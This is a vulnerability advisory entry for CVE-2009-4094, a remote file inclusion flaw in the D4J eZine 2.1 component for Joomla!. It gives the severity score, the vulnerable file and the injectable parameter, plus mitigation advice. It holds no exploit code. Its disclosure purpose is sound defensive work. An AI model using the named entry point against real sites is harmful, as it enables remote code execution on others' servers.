PT-2009-6273 · D4J+1 · Com Ezine+1
Published
2009-11-27
·
Updated
2024-02-14
·
CVE-2009-4094
CVSS v2.0
7.5
High
| Vector | AV:N/AC:L/Au:N/C:P/I:P/A:P |
Name of the Vulnerable Software and Affected Versions
Joomla! component com ezine version 2.1
Description
A remote file inclusion issue in the class/php/d4m ajax pagenav.php file of the D4J eZine component for Joomla! allows remote attackers to execute arbitrary PHP code via a URL in the
GLOBALS[mosConfig absolute path] parameter.Recommendations
For version 2.1, consider disabling the
d4m ajax pagenav.php file or restricting access to it until a patch is available. Avoid using the GLOBALS[mosConfig absolute path] parameter in the affected component to minimize the risk of exploitation.Exploit
Fix
Code Injection
Found an issue in the description? Have something to add? Feel free to write us 👾
Weakness Enumeration
Related Identifiers
Affected Products
Joomla!
Com Ezine